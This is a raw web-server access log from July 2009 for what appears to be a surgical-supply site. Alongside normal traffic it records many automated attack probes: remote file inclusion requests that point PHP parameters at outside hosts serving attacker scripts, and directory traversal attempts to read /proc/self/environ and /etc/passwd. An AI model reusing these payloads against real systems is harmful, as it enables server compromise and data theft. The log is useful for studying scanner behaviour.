72.135.21.13 - - [17/Jul/2009:00:56:56 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
66.249.68.247 - - [17/Jul/2009:00:56:47 -0400] "GET /logs/access_log.Q109061400 HTTP/1.1" 200 2160115 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
70.187.169.99 - - [17/Jul/2009:00:57:10 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
66.249.68.70 - - [17/Jul/2009:00:57:21 -0400] "GET /images/ACE_platelet_procedure.pdf HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [17/Jul/2009:00:57:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.55.107.206 - - [17/Jul/2009:00:57:30 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76277 "http://www.bing.com/search?q=search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
211.230.156.161 - - [17/Jul/2009:00:58:02 -0400] "GET /logs/access_log.Q109060600%20/e404.php?DOCUMENT_ROOT=http://akademik.pasca.unpad.ac.id/daftar/dir_uploads/.../id.txt%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.230.156.161 - - [17/Jul/2009:00:58:02 -0400] "GET /logs/error_log.Q109060600%20/e404.php?DOCUMENT_ROOT=http://akademik.pasca.unpad.ac.id/daftar/dir_uploads/.../id.txt%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
66.11.230.36 - - [17/Jul/2009:00:59:47 -0400] "GET /logs/index.php?inhalt=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:00:59:47 -0400] "GET /logs/access_log.Q109052900%20%20/index.php?inhalt=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:00:59:47 -0400] "GET /index.php?inhalt=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:01:00:20 -0400] "GET /logs/access_log.Q109061300%20%20/index.php?inhalt=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:01:02:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
117.74.99.225 - - [17/Jul/2009:01:02:36 -0400] "GET /mygallerybrowser.php?myPath=http://www.porn-free.org/fx29id1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
117.74.99.225 - - [17/Jul/2009:01:02:36 -0400] "GET /logs/mygallerybrowser.php?myPath=http://www.porn-free.org/fx29id1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
117.74.99.225 - - [17/Jul/2009:01:02:36 -0400] "GET /logs/access_log.Q109052500/mygallerybrowser.php?myPath=http://www.porn-free.org/fx29id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
117.74.99.225 - - [17/Jul/2009:01:02:47 -0400] "GET /logs/access_log.Q109063000/mygallerybrowser.php?myPath=http://www.porn-free.org/fx29id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
72.192.252.248 - - [17/Jul/2009:01:02:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
72.192.252.248 - - [17/Jul/2009:01:02:56 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3"
117.74.99.225 - - [17/Jul/2009:01:03:49 -0400] "GET /logs/access_log.Q109052500/mygallerybrowser.php?myPath=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
117.74.99.225 - - [17/Jul/2009:01:03:49 -0400] "GET /mygallerybrowser.php?myPath=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
117.74.99.225 - - [17/Jul/2009:01:03:49 -0400] "GET /logs/mygallerybrowser.php?myPath=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
117.74.99.225 - - [17/Jul/2009:01:03:55 -0400] "GET /logs/access_log.Q109063000/mygallerybrowser.php?myPath=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
117.74.99.225 - - [17/Jul/2009:01:04:23 -0400] "GET /logs/access_log.Q109052500/mygallerybrowser.php?myPath=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
117.74.99.225 - - [17/Jul/2009:01:04:23 -0400] "GET /mygallerybrowser.php?myPath=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
117.74.99.225 - - [17/Jul/2009:01:04:24 -0400] "GET /logs/mygallerybrowser.php?myPath=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
117.74.99.225 - - [17/Jul/2009:01:04:28 -0400] "GET /logs/access_log.Q109063000/mygallerybrowser.php?myPath=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
66.249.68.70 - - [17/Jul/2009:01:07:06 -0400] "GET /images/items/index18_needlcomb.jpg HTTP/1.1" 200 3025 "-" "Googlebot-Image/1.0"
209.59.12.99 - - [17/Jul/2009:01:07:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
117.74.99.225 - - [17/Jul/2009:01:07:31 -0400] "GET /logs/access_log.Q109052500%20%20/mygallerybrowser.php?myPath=http://www.porn-free.org/fx29id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
117.74.99.225 - - [17/Jul/2009:01:07:38 -0400] "GET /logs/access_log.Q109063000%20%20/mygallerybrowser.php?myPath=http://www.porn-free.org/fx29id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:01:09:11 -0400] "GET //bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:01:09:12 -0400] "GET /logs//bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:01:09:12 -0400] "GET /logs/access_log.Q109071100%20%20//bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:01:09:15 -0400] "GET /logs//bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:01:09:15 -0400] "GET //bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:01:09:15 -0400] "GET /logs/access_log.Q109071100%20%20//bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:01:10:20 -0400] "GET /logs/access_log.Q109053100%20%20//bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:01:10:20 -0400] "GET /logs/access_log.Q109053100%20%20//bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
117.74.99.225 - - [17/Jul/2009:01:10:42 -0400] "GET /logs/access_log.Q109052500%20/mygallerybrowser.php?myPath=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
117.74.99.225 - - [17/Jul/2009:01:11:39 -0400] "GET /logs/access_log.Q109052500%20/mygallerybrowser.php?myPath=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
66.249.68.247 - - [17/Jul/2009:01:12:08 -0400] "GET /images/nav_store_search_icon.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
218.145.31.242 - - [17/Jul/2009:01:12:18 -0400] "GET /logs/access_log.Q109051100/index.php?inhalt=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
218.145.31.242 - - [17/Jul/2009:01:12:18 -0400] "GET /logs/access_log.Q109051400/index.php?inhalt=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
218.145.31.242 - - [17/Jul/2009:01:12:18 -0400] "GET /logs/access_log.Q109051100/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
218.145.31.242 - - [17/Jul/2009:01:12:18 -0400] "GET /logs/access_log.Q109051400/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
218.145.31.242 - - [17/Jul/2009:01:12:19 -0400] "GET /logs/access_log.Q109051100/index.php?inhalt=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
218.145.31.242 - - [17/Jul/2009:01:12:19 -0400] "GET /logs/access_log.Q109051400/index.php?inhalt=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 234 "-" "XXXXXX"
218.145.31.242 - - [17/Jul/2009:01:12:19 -0400] "GET /logs/access_log.Q109051100/index.php?inhalt=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
218.145.31.242 - - [17/Jul/2009:01:12:20 -0400] "GET /logs/access_log.Q109051400/index.php?inhalt=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "XXXXXX"
209.59.12.99 - - [17/Jul/2009:01:12:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [17/Jul/2009:01:12:43 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:01:12:43 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:01:12:43 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:01:12:51 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:01:12:51 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:01:12:51 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:01:12:57 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:01:12:57 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:01:12:57 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:01:13:02 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:01:13:02 -0400] "GET /logs/access_log.Q109052800//include/bbs.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:01:13:02 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:01:13:42 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:01:13:42 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:01:13:45 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:01:14:03 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:01:14:03 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
190.144.44.36 - - [17/Jul/2009:01:14:03 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
58.227.193.198 - - [17/Jul/2009:01:14:18 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.227.193.198 - - [17/Jul/2009:01:14:18 -0400] "GET /logs/access_log.Q109062100/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
58.227.193.198 - - [17/Jul/2009:01:14:18 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:01:14:58 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:01:14:58 -0400] "GET /logs/access_log.Q109061400%20%20/joomla/index.php?option=com_restaurante&task=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:01:14:58 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:01:15:05 -0400] "GET /logs/error_log.Q109061400%20%20/joomla/index.php?option=com_restaurante&task=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.227.193.198 - - [17/Jul/2009:01:16:01 -0400] "GET /logs/access_log.Q109062100%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
58.227.193.198 - - [17/Jul/2009:01:16:53 -0400] "GET /logs/error_log.Q109062100%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:01:16:59 -0400] "GET /logs/access_log.Q109061400/joomla/index.php?option=com_restaurante&task=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:01:16:59 -0400] "GET /logs/error_log.Q109061400/joomla/index.php?option=com_restaurante&task=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:01:17:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
24.251.183.19 - - [17/Jul/2009:01:18:53 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "http://sn121w.snt121.mail.live.com/mail/InboxLight.aspx?FolderID=00000000-0000-0000-0000-000000000001&n=1530980504" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
218.145.31.242 - - [17/Jul/2009:01:21:11 -0400] "GET /logs/access_log.Q109051100//index.php?interno=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
218.145.31.242 - - [17/Jul/2009:01:21:11 -0400] "GET /logs/access_log.Q109051400//index.php?interno=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
218.145.31.242 - - [17/Jul/2009:01:21:12 -0400] "GET /logs/access_log.Q109051100/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
218.145.31.242 - - [17/Jul/2009:01:21:12 -0400] "GET /logs/access_log.Q109051400/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
218.145.31.242 - - [17/Jul/2009:01:21:13 -0400] "GET /logs/access_log.Q109051100//index.php?interno=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
218.145.31.242 - - [17/Jul/2009:01:21:13 -0400] "GET /logs/access_log.Q109051400//index.php?interno=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
218.145.31.242 - - [17/Jul/2009:01:21:13 -0400] "GET /logs/access_log.Q109051400//index.php?interno=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
218.145.31.242 - - [17/Jul/2009:01:21:13 -0400] "GET /logs/access_log.Q109051100//index.php?interno=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
218.145.31.242 - - [17/Jul/2009:01:21:32 -0400] "GET /logs/access_log.Q109051100//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.145.31.242 - - [17/Jul/2009:01:21:32 -0400] "GET /logs/access_log.Q109051400//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
218.145.31.242 - - [17/Jul/2009:01:21:33 -0400] "GET /logs/access_log.Q109051400/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
218.145.31.242 - - [17/Jul/2009:01:21:33 -0400] "GET /logs/access_log.Q109051100/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
218.145.31.242 - - [17/Jul/2009:01:21:33 -0400] "GET /logs/access_log.Q109051100//ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 261 "-" "XXXXXX"
218.145.31.242 - - [17/Jul/2009:01:21:33 -0400] "GET /logs/access_log.Q109051400//ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 261 "-" "XXXXXX"
218.145.31.242 - - [17/Jul/2009:01:21:34 -0400] "GET /logs/access_log.Q109051100//ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 261 "-" "XXXXXX"
218.145.31.242 - - [17/Jul/2009:01:21:34 -0400] "GET /logs/access_log.Q109051400//ktmlpro/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 261 "-" "XXXXXX"
201.76.47.207 - - [17/Jul/2009:01:21:43 -0400] "GET /logs/access_log.Q109070600/index.php?pagina=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
201.76.47.207 - - [17/Jul/2009:01:21:43 -0400] "GET /index.php?pagina=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
201.76.47.207 - - [17/Jul/2009:01:21:44 -0400] "GET /logs/index.php?pagina=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
201.76.47.207 - - [17/Jul/2009:01:22:18 -0400] "GET /logs/access_log.Q109052500/index.php?pagina=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
87.227.31.168 - - [17/Jul/2009:01:22:29 -0400] "GET /logs/access_log.Q109070600/index.php?pagina=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
87.227.31.168 - - [17/Jul/2009:01:22:30 -0400] "GET /index.php?pagina=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
77.221.130.14 - - [17/Jul/2009:01:22:30 -0400] "GET /logs/access_log.Q109071100//bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
87.227.31.168 - - [17/Jul/2009:01:22:30 -0400] "GET /logs/index.php?pagina=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
77.221.130.14 - - [17/Jul/2009:01:22:43 -0400] "GET /logs/access_log.Q109053100//bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:01:22:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.227.31.168 - - [17/Jul/2009:01:23:37 -0400] "GET /logs/access_log.Q109052500/index.php?pagina=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
119.93.90.155 - - [17/Jul/2009:01:24:45 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://id1.fileave.com/id1.txt.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
119.93.90.155 - - [17/Jul/2009:01:25:05 -0400] "GET /logs/access_log.Q109070500%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://id1.fileave.com/id1.txt.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
119.93.90.155 - - [17/Jul/2009:01:25:05 -0400] "GET /logs/error_log.Q109061700%20%20/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://id1.fileave.com/id1.txt.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
98.249.132.166 - - [17/Jul/2009:01:25:36 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1) Gecko/20090624 Firefox/3.5"
67.164.31.34 - - [17/Jul/2009:01:25:53 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.18 (KHTML, like Gecko)"
77.221.130.14 - - [17/Jul/2009:01:26:00 -0400] "GET /logs/access_log.Q109071100//bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
77.221.130.14 - - [17/Jul/2009:01:26:15 -0400] "GET /logs/access_log.Q109053100//bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr///db_control/download/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
62.149.163.198 - - [17/Jul/2009:01:26:48 -0400] "GET /logs/access_log.Q109062900//components/com_flyspray/startdown.php?file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 263 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
62.149.163.198 - - [17/Jul/2009:01:26:48 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 236 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
62.149.163.198 - - [17/Jul/2009:01:26:48 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
62.149.163.198 - - [17/Jul/2009:01:26:48 -0400] "GET /logs/access_log.Q109062900/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
62.149.163.198 - - [17/Jul/2009:01:26:48 -0400] "GET /logs/access_log.Q109062900//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 263 "-" "XXXXXX"
62.149.163.198 - - [17/Jul/2009:01:26:48 -0400] "GET //components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 236 "-" "XXXXXX"
62.149.163.198 - - [17/Jul/2009:01:26:48 -0400] "GET /logs/access_log.Q109062900//components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 263 "-" "XXXXXX"
62.149.163.198 - - [17/Jul/2009:01:26:48 -0400] "GET //components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "XXXXXX"
